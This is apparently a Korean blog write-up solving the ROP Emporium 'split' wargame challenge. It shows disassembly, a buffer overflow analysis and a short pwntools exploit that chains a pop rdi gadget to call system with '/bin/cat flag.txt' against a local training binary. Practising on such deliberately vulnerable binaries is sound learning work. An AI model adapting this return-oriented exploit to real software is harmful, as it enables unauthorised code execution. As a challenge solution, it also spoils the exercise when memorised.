Wargame/ROP Emporium
split
wyv3rn
2023. 7. 7. 14:04
728x90
반응형
1. intro
2. code 및 분석
2.1. code
pwnme
0x00000000004006e8 <+0>: push %rbp
0x00000000004006e9 <+1>: mov %rsp,%rbp
0x00000000004006ec <+4>: sub $0x20,%rsp
0x00000000004006f0 <+8>: lea -0x20(%rbp),%rax
0x00000000004006f4 <+12>: mov $0x20,%edx
0x00000000004006f9 <+17>: mov $0x0,%esi
0x00000000004006fe <+22>: mov %rax,%rdi
0x0000000000400701 <+25>: call 0x400580 <memset@plt>
0x0000000000400706 <+30>: mov $0x400810,%edi
0x000000000040070b <+35>: call 0x400550 <puts@plt>
0x0000000000400710 <+40>: mov $0x40083c,%edi
0x0000000000400715 <+45>: mov $0x0,%eax
0x000000000040071a <+50>: call 0x400570 <printf@plt>
0x000000000040071f <+55>: lea -0x20(%rbp),%rax
0x0000000000400723 <+59>: mov $0x60,%edx
0x0000000000400728 <+64>: mov %rax,%rsi
0x000000000040072b <+67>: mov $0x0,%edi
0x0000000000400730 <+72>: call 0x400590 <read@plt>
0x0000000000400735 <+77>: mov $0x40083f,%edi
0x000000000040073a <+82>: call 0x400550 <puts@plt>
0x000000000040073f <+87>: nop
0x0000000000400740 <+88>: leave
0x0000000000400741 <+89>: retusefulFunction
0x0000000000400742 <+0>: push %rbp
0x0000000000400743 <+1>: mov %rsp,%rbp
0x0000000000400746 <+4>: mov $0x40084a,%edi
0x000000000040074b <+9>: call 0x400560 <system@plt>
0x0000000000400750 <+14>: nop
0x0000000000400751 <+15>: pop %rbp
0x0000000000400752 <+16>: ret
2.2. 분석
앞선 문제와 거의 같다.
다만 system 함수를 call 할때의 인자인 0x40084a에 들어있는 문자열은 /bin/ls 이다.
3. 취약점 확인 및 공격 준비
3.1. 취약점
buffer overflow
3.2. 공격 준비
위에서 이야기한 것과 같이 system call 시 인자가 /bin/ls이다.
gef➤ x/s 0x40084a
0x40084a: "/bin/ls"하지만 플래그를 읽기위한 문자열이 바이너리 내에 있다.
gef➤ grep "/bin/cat flag.txt"
[+] Searching '/bin/cat flag.txt' in memory
[+] In '/home/wyv3rn/rop/split'(0x601000-0x602000), permission=rw-
0x601060 - 0x601071 → "/bin/cat flag.txt"그러므로 이를 인자로 system 함수를 바로 call 하면 되겠다.
4. exploit
from pwn import *
p = process('./split')
pay = b'A'*0x28
pay += p64(0x00000000004007c3) #pop rdi, ret
pay += p64(0x601060)
pay += p64(0x000000000040074b)
p.sendlineafter(b'> ',pay)
p.interactive()728x90
반응형